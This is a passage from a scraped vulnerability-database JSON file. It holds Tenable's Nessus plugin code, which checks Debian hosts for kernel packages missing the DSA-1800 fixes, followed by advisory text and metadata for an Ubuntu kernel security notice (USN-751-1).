Advisory DSA-1800. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38795);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-0028\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1184\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", \"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_bugtraq_id(33672, 33948, 33951, 34020, 34205, 34405, 34453, 34654, 34673);\n script_xref(name:\"DSA\", value:\"1800\");\n\n script_name(english:\"Debian DSA-1800-1 : linux-2.6 - denial of service/privilege escalation/sensitive memory leak\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, privilege escalation or a sensitive\nmemory leak. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2009-0028\n Chris Evans discovered a situation in which a child\n process can send an arbitrary signal to its parent.\n\n - CVE-2009-0834\n Roland McGrath discovered an issue on amd64 kernels that\n allows local users to circumvent system call audit\n configurations which filter based on the syscall numbers\n or argument details.\n\n - CVE-2009-0835\n Roland McGrath discovered an issue on amd64 kernels with\n CONFIG_SECCOMP enabled. By making a specially crafted\n syscall, local users can bypass access restrictions.\n\n - CVE-2009-0859\n Jiri Olsa discovered that a local user can cause a\n denial of service (system hang) using a SHM_INFO shmctl\n call on kernels compiled with CONFIG_SHMEM disabled.\n This issue does not affect prebuilt Debian kernels.\n\n - CVE-2009-1046\n Mikulas Patocka reported an issue in the console\n subsystem that allows a local user to cause memory\n corruption by selecting a small number of 3-byte UTF-8\n characters.\n\n - CVE-2009-1072\n Igor Zhbanov reported that nfsd was not properly\n dropping CAP_MKNOD, allowing users to create device\n nodes on file systems exported with root_squash.\n\n - CVE-2009-1184\n Dan Carpenter reported a coding issue in the selinux\n subsystem that allows local users to bypass certain\n networking checks when running with compat_net=1.\n\n - CVE-2009-1192\n Shaohua Li reported an issue in the AGP subsystem they\n may allow local users to read sensitive kernel memory\n due to a leak of uninitialized memory.\n\n - CVE-2009-1242\n Benjamin Gilbert reported a local denial of service\n vulnerability in the KVM VMX implementation that allows\n local users to trigger an oops.\n\n - CVE-2009-1265\n Thomas Pollet reported an overflow in the af_rose\n implementation that allows remote attackers to retrieve\n uninitialized kernel memory that may contain sensitive\n data.\n\n - CVE-2009-1337\n Oleg Nesterov discovered an issue in the exit_notify\n function that allows local users to send an arbitrary\n signal to a process by running a program that modifies\n the exit_signal field and then uses an exec system call\n to launch a setuid application.\n\n - CVE-2009-1338\n Daniel Hokka Zakrisson discovered that a kill(-1) is\n permitted to reach processes outside of the current\n process namespace.\n\n - CVE-2009-1439\n Pavan Naregundi reported an issue in the CIFS filesystem\n code that allows remote users to overwrite memory via a\n long nativeFileSystem field in a Tree Connect response\n during mount.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0859\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1072\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux-2.6 and user-mode-linux packages.\n\nFor the oldstable distribution (etch), these problems, where\napplicable, will be fixed in future updates to linux-2.6 and\nlinux-2.6.24.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-15lenny2.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or 'leap-frog' fashion.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 20, 119, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"linux-doc-2.6.26\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-486\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-4kc-malta\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-5kc-malta\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-686-bigmem\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-alpha\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-arm\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-armel\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-hppa\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-i386\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-ia64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-mips\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-mipsel\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-powerpc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-s390\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-all-sparc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-alpha-generic\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-alpha-legacy\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-alpha-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-common\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-common-openvz\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-common-vserver\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-common-xen\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-footbridge\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-iop32x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-itanium\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-ixp4xx\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-mckinley\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-openvz-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-openvz-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-orion5x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-parisc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-parisc-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-parisc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-parisc64-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-powerpc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-powerpc-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-powerpc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-r4k-ip22\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-r5k-cobalt\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-r5k-ip32\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-s390\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-s390x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-sb1-bcm91250a\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-sparc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-sparc64-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-versatile\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-686-bigmem\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-itanium\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-mckinley\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-powerpc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-powerpc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-s390x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-vserver-sparc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-xen-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-headers-2.6.26-2-xen-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-486\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-4kc-malta\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-5kc-malta\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-686-bigmem\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-alpha-legacy\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-alpha-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-footbridge\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-iop32x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-itanium\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-ixp4xx\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-mckinley\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-openvz-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-openvz-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-orion5x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-parisc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-parisc-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-parisc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-parisc64-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-powerpc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-powerpc-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-powerpc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-r4k-ip22\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-r5k-cobalt\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-r5k-ip32\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-s390\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-s390-tape\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-s390x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-sb1-bcm91250a\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-sb1a-bcm91480b\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-sparc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-sparc64-smp\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-versatile\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-686-bigmem\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-itanium\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-mckinley\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-powerpc\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-powerpc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-s390x\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-vserver-sparc64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-xen-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-image-2.6.26-2-xen-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-libc-dev\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-manual-2.6.26\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-modules-2.6.26-2-xen-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-modules-2.6.26-2-xen-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-patch-debian-2.6.26\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-source-2.6.26\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-support-2.6.26-2\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"linux-tree-2.6.26\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"user-mode-linux\", reference:\"2.6.26-1um-2+15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xen-linux-system-2.6.26-2-xen-686\", reference:\"2.6.26-15lenny2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xen-linux-system-2.6.26-2-xen-amd64\", reference:\"2.6.26-15lenny2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:57:50", "description": "NFS did not correctly handle races between fcntl and interrupts. A local attacker on an NFS mount could consume unlimited kernel memory, leading to a denial of service. Ubuntu 8.10 was not affected.\n(CVE-2008-4307)\n\nSparc syscalls did not correctly check mmap regions. A local attacker could cause a system panic, leading to a denial of service. Ubuntu 8.10 was not affected. (CVE-2008-6107)\n\nIn certain situations, cloned processes were able to send signals to parent processes, crossing privilege boundaries. A local attacker could send arbitrary signals to parent processes, leading to a denial of service. (CVE-2009-0028)\n\nThe kernel keyring did not free memory correctly. A local attacker could consume unlimited kernel memory, leading to a denial of service.\n(CVE-2009-0031)\n\nThe SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)\n\nThe eCryptfs filesystem did not correctly handle certain VFS return codes. A local attacker with write-access to an eCryptfs filesystem could cause a system crash, leading to a denial of service.\n(CVE-2009-0269)\n\nThe Dell platform device did not correctly validate user parameters. A local attacker could perform specially crafted reads to crash the system, leading to a denial of service. (CVE-2009-0322)\n\nThe page fault handler could consume stack memory. A local attacker could exploit this to crash the system or gain root privileges with a Kprobe registered. Only Ubuntu 8.10 was affected. (CVE-2009-0605)\n\nNetwork interfaces statistics for the SysKonnect FDDI driver did not check capabilities. A local user could reset statistics, potentially interfering with packet accounting systems. (CVE-2009-0675)\n\nThe getsockopt function did not correctly clear certain parameters. A local attacker could read leaked kernel memory, leading to a loss of privacy. (CVE-2009-0676)\n\nThe ext4 filesystem did not correctly clear group descriptors when resizing. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2009-0745)\n\nThe ext4 filesystem did not correctly validate certain fields. A local attacker could mount a malicious ext4 filesystem, causing a system crash, leading to a denial of service. (CVE-2009-0746, CVE-2009-0747, CVE-2009-0748)\n\nThe syscall interface did not correctly validate parameters when crossing the 64-bit/32-bit boundary. A local attacker could bypass certain syscall restricts via crafted syscalls. (CVE-2009-0834, CVE-2009-0835)\n\nThe shared memory subsystem did not correctly handle certain shmctl calls when CONFIG_SHMEM was disabled. Ubuntu kernels were not vulnerable, since CONFIG_SHMEM is enabled by default. (CVE-2009-0859)\n\nThe virtual consoles did not correctly handle certain UTF-8 sequences.\nA local attacker on the physical console could exploit this to cause a system crash, leading to a denial of service. (CVE-2009-1046).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Ubuntu 7.10 / 8.04 LTS / 8.10 : linux, linux-source-2.6.22 vulnerabilities (USN-751-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4307", "CVE-2008-6107", "CVE-2009-0028", "CVE-2009-0031", "CVE-2009-0065", "CVE-2009-0269", "CVE-2009-0322", "CVE-2009-0605", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-0745", "CVE-2009-0746", "CVE-2009-0747", "CVE-2009-0748", "CVE-2009-0834", "CVE-2009-0835", "CVE-2009-0859", "CVE-2009-1046"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.22", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.24", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.27", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-openvz", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-rt", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ume", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-xen", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-cell", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpiacompat", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-openvz", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-rt", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ume", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-xen", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel", "p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.22", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.24", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.27", "cpe:/o:canonical:ubuntu_linux:7.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10"], "id": "UBUNTU_USN-751-1.NASL", "href": "https://www.tenable.com/plugins/nessus/37337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 